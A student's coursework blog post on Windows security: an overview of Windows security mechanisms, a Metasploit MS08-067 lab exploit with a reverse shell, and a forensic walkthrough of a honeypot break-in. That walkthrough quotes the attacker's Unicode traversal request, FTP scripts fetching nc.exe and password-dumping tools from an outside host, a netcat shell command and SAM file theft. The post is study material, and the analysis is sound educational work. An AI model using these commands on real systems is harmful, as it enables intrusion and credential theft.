20199106 2019-2020-2 《网络攻防实践》第七周作业

20199106 2019-2020-2 《网络攻防实践》第七周作业

作业说明

这个作业属于哪个课程 网络攻防实践
这个作业的要求在哪里 第七周作业: Windows操作系统安全攻防
我在该课程的目标 对网络攻防技术有一个比较全面的认识,能够掌握基本的攻防操作。
这个作业在哪个具体方面帮助我实现目标 学习了Windows系统网络攻防的知识和体系。

作业正文

实践内容

本章主要讲windows操作系统的安全攻防体系,首先先介绍了Windows操作系统的基本框架,然后介绍了Windows操作系统的安全体系结构和机制,最后从远程安全攻防技术和本地安全攻防技术对Windows系统的攻防进行彻底的介绍。

Windows操作系统基本框架概述

  • Windows基本结构分为运行于处理器特权模式的操作系统内核以及运行在处理器非特权模式的用户,即为内核态和用户态。
    • 内核态:Windows执行体(基本系统服务)、Windows内核(如线程调度等)体、设备驱动程序、硬件抽象层、Windows窗口与图形界面接口。
    • 用户态:系统支持进程、环境子系统服务进程(环境是指系统展示给用户的个性化部分)、服务进程、用户应用软件、核心子系统DLL。
  • Windows操作系统的基本机构示意图

  • Windows进程和线程管理机制:Windows将进程视作可执行程序运行时刻的容器,包括一个私有虚拟内存空间描述符,系统资源对象句柄列表,带有执行用户账号权限的安全访问令牌,记录了进程ID及其父进程ID等信息,并至少包含一个作为进程内部指令执行体的执行线程。线程作为指令执行的具体载体,其线程控制块TCB中包含程序执行的上下文信息。
  • Windows内存管理机制:虚拟内存空间分为系统核心内存区间(内核执行模块)与用户内存区间(用户程序执行模块)两部分,对于32位Windows系统而言,2GB〜4GB区间为系统核心内存,0GB〜2GB 区间为用户态内存。
  • Windows文件管理机制:使用NTFS文件系统,可执行文件釆用PE格式,主要由DoS头、PE头、分段表,以及具体的代码段、数据段等组成。
  • Windows注册表管理机制:Windows注册表可通过系统自帯的regedit.exe 注册表查找编辑工具或其他第三方工具进行访问与修改,并可使用RegMon等工具监控系统的注册表读写操作。在系统的全局配置、用户和应用软件配置信息担任重要的角色。
  • Windows的网络机制:Windows网络组件模块包括各种网卡硬件的设备驱动程序、NDIS 库及 miniport 驱动程序、TDI传输层(网络协议驱动)、网络API DLL及TDI客户端、网络应用程序与服务进程。

Windows操作系统安全体系结构与机制

  • 安全体系结构:

    • 监控器模型:主体到客体的访问都通过监控器作为中间,由引用监控器根据安全访问控制策略来进行授权访问,所有访问记录都由监控器生成审计日志。
    • 核心:SRM安全引用监控器(内核中)、LSASS安全服务(用户态)、winlogon/netlogn、以及Eventlog。
  • 身份认证机制:

    • 安全主体:用户、用户组、计算机。
    • 身份认证:本地身份认证(winlogon进程、GINA图形化登录窗口与LSASS服务)、网络身份认证(NTLM、Lanman、kerberos)。
  • 授权与访问控制机制:引用监控器模型,由SRM(内核态)和LSASS(用户态)共同完成。

    • 对象:文件,目录,注册表键值,内核对象,同步对象,私有对象,管道,内存,通信接口。
    • 属性组成:Owner SID,Group SID,DACL自主访问控制列表,SACL系统审计访问控制列表。
  • 安全审计机制:LSASS服务保存审计策略,SRM在进行对象访问授权时,也将审计记录发送给LSASS服务,再由EventLog服务进行写入记录。

  • 其他安全机制:安全中心(防火墙、补丁、病毒防护),IPsec加载和验证机制,EPS加密文件系统,文件保护机制,捆绑的IE浏览器所提供的隐私保护和浏览器安全保护机制等。

Windows远程安全攻防技术

目前Windows远程攻击技术有以下几类:远程口令猜解与破解攻击、攻击Windows网络服务、攻击Windows客户端和用户

  • windows远程口令猜解攻击与破解攻击
    -远程口令字猜测:

    • 攻击渠道:SMB协议,其他包括WMI服务、TS远程桌面终端服务,mysql数据库服务、SharePoint。

    • 工具:Legion、enum、smbgrind、NTScan、XScan、流光、NTScan汉化版。

    • 原理:SMB服务决定授予网络用户对所请求的共享文件或打印机的访问权之前,会先进行身份验证,此时用户输入正确口令,攻击者对系统实施远程口令字猜测攻击。由于系统中存在大量弱口令,使得远程口令猜测成为可能。

    • 远程口令字交换通信窃听与破解:

      • 攻击渠道:NTLM、LanMan、NTLMV2和kerberos网络认证协议的弱点。
      • 工具:L0phtcrack、Cain and Abel
    • 防范措施:尽量关闭不必要的易受攻击的网络服务、配置主机防火墙来限制某些端口服务、网络防火墙限制这些服务的访问、禁用过时且有安全缺陷的Lanman和NTLM、指定强口令策略。

  • windows网络服务远程渗透攻击

    • 类型: 针对NETBIOS服务、针对SMB服务、针对MSRPC服务、针对Windows系统上微软网络的远程渗透攻击、针对Windows系统上第三方服务的远程渗透攻击。

    • 防范措施:从设计开发根源上减少安全漏洞的出现,及时进行漏洞补丁修护,尽可能快速更新与应用软件安全补丁;在安全漏洞从被意外公布和利用到补丁发布的这段“零日”漏洞时间中,管理员要尽快对安全敏感的服务器做测试和实施可用的攻击缓解配置;利用服务软件厂商及社区提供的安全核对清单来对服务进行安全配置,利用一些安全插件,利用漏洞扫描软件扫描漏洞及时进行修复。

  • Metasploit渗透测试:

    • 基础库文件:包括Rex,framework-core和framework-base三部分。
    • 模块:辅助模块、渗透攻击模块(主动、被动)、攻击载荷模块(在渗透攻击成功后促使目标系统运行)、空指令模块、编码器模块、后渗透模块(获取敏感信息)。

Windows系统本地安全攻防技术

  • windows本地特权提升

    • 常见手段:溢出提权、windows错误系统配置、计划任务提权。
    • 防范措施:及时打补丁、及时跟进厂家的安全警告
  • windows敏感信息窃取

    • 常见手段:windows系统口令字密文提取技术、windows系统口令字破解技术、用户敏感信息窃取等手段
    • 防范措施:使用安全度高、能抵挡破解的口令
  • windows消灭踪迹

    • 常见手段:关闭审计功能、清理事件日志。
    • 防范措施:实现配置好系统审计和网络服务审计功能,并将日志传输到安全服务器中。
  • 远程控制与后门

    • 主要手段:向受控主机中植入第三方的远程控制与后门程序,主要包含命令行远程控制程序和图形化远程控制程序。
    • 防范措施:采用一些后门检测软件来尝试发现攻击者隐藏的后门程序。

实验过程

动手实践:Metasploit Windows Attack

任务:使用Metasploit软件进行Windows远程渗透攻击实验。

具体任务内容:使用Windows Attacker/BT4攻击机尝试对Windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机访问权。

实践步骤:

  • 启动metasploit软件,根据个人喜好使用msfconsole、msfgui、msfweb之一;
  • 使用exploit:windows/smb/ms08_067_netapi渗透攻击模块;
  • 选择攻击PAYLOAD为远程shell(正向或反向;连接均可);
  • 设置渗透攻击参数(RHOST、LHOST、TARGET等);
  • 执行渗透攻击;
  • 查看是否正确得到远程shell,并查看获得的权限。

实验环境

实验环境 IP地址
靶机:Win2kServer 192.168.200.124
攻击机:kali 192.168.200.2

1、首先在攻击机kali中输入命令msfconsole进入Metasploit:

使用命令search ms08-067查看该漏洞的详细情况,在exploit库中可找到针对该漏洞的渗透攻击模块。

使用该攻击模块use exploit/windows/smb/ms08_067_netapi,并使用命令show payloads列举出所有适用的负载模块,查看有效的攻击载荷。

选择payload 3,反向连接。使用命令set payload 3设置攻击的载荷为tcp的反向连接,配置该渗透攻击模块和攻击负载模块所必须的参数,用set lhost 192.168.200.2 为攻击机kali地址, set rhost 192.168.200.124 为靶机地址,使用show options 查看当前参数列表及其默认装置,

接着,输入run命令,出现一段蓝色的信息,这时再回车一下,界面显示如下,出现'C:\WINNT\system32:',说明攻击机已经成功进入靶机系统,输入ipconfig命令验证一下,执行成功。说明攻击成功。

此时,在攻击机输入命令set user 1234/add,尝试在靶机上新建一个用户1234,在靶机上查看,执行命令前后对比一下发现新建用户成功。


取证分析实践:解码一次成功的NT系统破解攻击

题目:来自213.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106(主机名为:lab.wiretrip.net),根据整个攻击过程的二进制记录文件snort-0204@0117.log,提取并分析攻击的全部过程。

  • 攻击者使用了什么破解工具进行攻击?
  • 攻击者如何使用这个破解工具进入并控制了系统?
  • 攻击者获得系统访问权限后做了什么?
  • 我们如何防止这样的攻击?
  • 你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?

1、攻击者使用了什么破解工具进行攻击?

用wireshark打开该二进制文件。并使用命令ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106过滤掉其他无关数据包。可以看到攻击机与靶机“三次握手”后建立了连接,追踪这条记录,发现靶机的操作系统为windows NT 5.0,

连接后,攻击机首先访问了靶机的http://lab.wiretrip.net/Default.htm,之后攻击机一直向目标主机发送http get请求获取资源,一开始get的内容是一些gif图片,第76行,出现了default.asp文件(ASP意为“动态服务器页面”,和现在比较流行的PHP一样同为后台脚本语言,运行ASP文件需要的服务器是IIS服务器),再到117行,发现info一栏中的信息GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1,说明攻击机在 http://lab.wiretrip.net/guest/default.asp进行了 Unicode 编码攻击并打开了NT系统启动文件 boot.ini ,因为 %C0%AF/ 的Unicode编码。

随后观察到编号130,140,149中都有msadc,追踪149号数据包,攻击者通过 msadcs.dll 中存在的RDS漏洞进行了SQL注入攻击,并执行了命令cmd /c echo werd >> c:\fun ,根据特征字符串 ADM!ROX!YOUR!WORLD ,可以查询到是由msadc(2).pl渗透攻击工具发起的攻击。

2、攻击者如何使用这个破解工具进入并控制了系统?

去掉筛选条件,依次往下看,在第一个1778->80开始,追踪TCP流,发现其指令为cmd /c echo user johna2k > ftpcom

继续往下找,依次可以找到以下指令:

cmd /c echo hacker2000 > ftpcom

cmd /c echo get samdump.dll > ftpcom

cmd /c echo get pdump.exe > ftpcom

cmd /c echo get nc.exe > ftpcom

cmd /c echo quit >> ftpcom

cmd /c ftp -s:ftpcom -n www.nether.net

根据这些指令可知: 攻击者首先创建了一个ftpcom脚本,并使用ftp连接www.nether.net(给出了用户名密码),尝试下载samdump.dll、pdump.exe和nc.exe(攻击工具)。

继续查看会话1791->80之后,308号数据开始出现ftp,攻击者开始进行ftp连接。通过追踪TCP流发现,这个连接由于口令错误导致连接失败。
直接筛选ftp,可以看到最终在编号1106处攻击者成功连接了FTP服务器。

接下来就看编号1106之前攻击者所发出的指令,发现攻击者由RDS攻击改为使用Unicode漏洞攻击。
copy C:\winnt\system32\cmd.exe cmd1.exe

cmd1.exe /c open 213.116.251.162 >ftpcom

cmd1.exe /c echo johna2k >>ftpcom

cmd1.exe /c echo haxedj00 >>ftpcom

cmd1.exe /c echo get nc.exe >>ftpcom

cmd1.exe /c echo get pdump.exe >>ftpcom

cmd1.exe /c echo get samdump.dll >>ftpcom

cmd1.exe /c echo quit >>ftpcom

再向后观察到编号1224,攻击者执行了命令cmd1.exe /c nc -l -p 6969 -e cmd1.exe 。表示攻击者连接了6969端口,并且获得了访问权限。至此,攻击者完成了进入系统并且获得访问权的过程。

3、攻击者获得系统访问权限后做了什么?

首先用tcp.port == 6969进行过滤,然后追踪TCP流来观察攻击者攻击行为。
可以看到攻击者尝试信息收集,使用net session(列出会话),但是没有权限,然后执行net users, 返回该主机的用户列表。

接着发了一个echo消息到C盘根目录文件README.NOW.Hax0r

接着尝试通过net group查看组用户、net localgroup查看本地组用户、以及 net group domain admins查看管理员组,但都失败了。

接下来,攻击者开始寻找msadc目录,发现他试着执行pdump来破解出Administrator口令密文,但是还是失败,于是攻击者删除了samdumppdump

接着,攻击者试着用rdisk获得SAM口令文件(安全账号管理器),rdisk是磁盘修复程序,执行rdisk /s-备份关键系统信息,在/repair目录中就会创建一个名为sam._的SAM压缩拷贝。并且攻击者把这个文件拷贝到har.txt并打印。

6969端口连接失败后,攻击者在会话1987->80进行了Unicode攻击,重新建立了一个端口6968。

通过追踪TCP流发现攻击者首先将SAM文件拷贝至IIS的根目录inetpub,攻击者获取该文件后,尝试删除,但因为锁定没有成功。然后攻击者把其他盘符看了一遍就退出了这个shell连接。

攻击还没结束,数据包编号大约4100的位置,攻击者在会话2007->80进行了Unicode攻击,并且重新建立了一个端口6868。
可以发现攻击者创建了一个test.txt文件,内容为This can't be true,并echo . >> default.htm篡改了首页。随后exit退出了当前的shell,然后跟随这个数据包往下,可以发现有很多其他的IP地址访问了新创建的test.txt文件。顺着最后Exit的数据包往下,发现攻击者继续进行了一个Unicode攻击,指令为del ftpcom,也就是删除了ftpcom脚本文件,这一步是为了清除痕迹。整个攻击结束。

4、我们如何防止这样的攻击?

  • 为这些漏洞打上补丁.
  • 禁用用不着的 RDS 等服务。
  • 防火墙封禁网络内部服务器发起的连接。
  • 为web server 在单独的文件卷上设置虚拟根目录。
  • 使用 NTFS 文件系统,因为 FAT 几乎不提供安全功能。
  • 使用 IIS Lockdown 和 URLScan 等工具加强 web server

5、你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?

攻击者发现了,因为他留下了下面的信息。

团队对抗实践:Windows系统远程渗透攻击和分析

任务:攻击方使用metasploit,选择metasploitable中的漏洞进行渗透攻击,获得控制权;防守方使用wireshark监听获得网络攻击的数据包文件,并结合wireshark分析攻击过程,获得攻击者IP地址、目的IP地址和端口、攻击发起时间、攻击利用漏洞、攻击使用的shellcode,以及攻击成功之后在本地执行的命令输入信息。

和第一个实践过程相同,首先由于靶机没有wireshark,所以选择在攻击方kali上开启wireshark进行监听。

可以看到TCP三次握手后,发送了许多SMB包,猜测为MS08-067漏洞。(由于MS08_067漏洞是通过 MSRPC over SMB 通道调用Server服务程序中的NetPathCanonicaliza 函数,这个函数存在逻辑错误,会栈缓冲区溢出,攻击者借此获得远程代码执行。)

抓包结果中分析出:
攻击机:192.168.200.2,端口:38823;靶机:192.168.200.124,端口:445;攻击发起时间:从ARP协议的询问开始(攻击发起时会发起ARP请求,第一个ARP请求的时间就是攻击发起的时间);

攻击利用的漏洞:针对SMB网络服务的漏洞;DCERPC解析器拒绝服务漏洞;SPOOLSS打印服务假冒漏洞(MS10-061)

在靶机上输入ipconfig,在wireshrak上跟踪TCP数据流发现了这一命令,可查看到本地执行的命令输入信息:

学习中遇到的问题及解决

学习感想和体会

好多不懂,继续学习吧。

参考资料

[《网络攻防技术与实践》 诸葛建伟](https://book.douban.com/subject/6558082/

posted @ 2020-04-16 11:47  happycarrot  阅读(241)  评论(0编辑  收藏  举报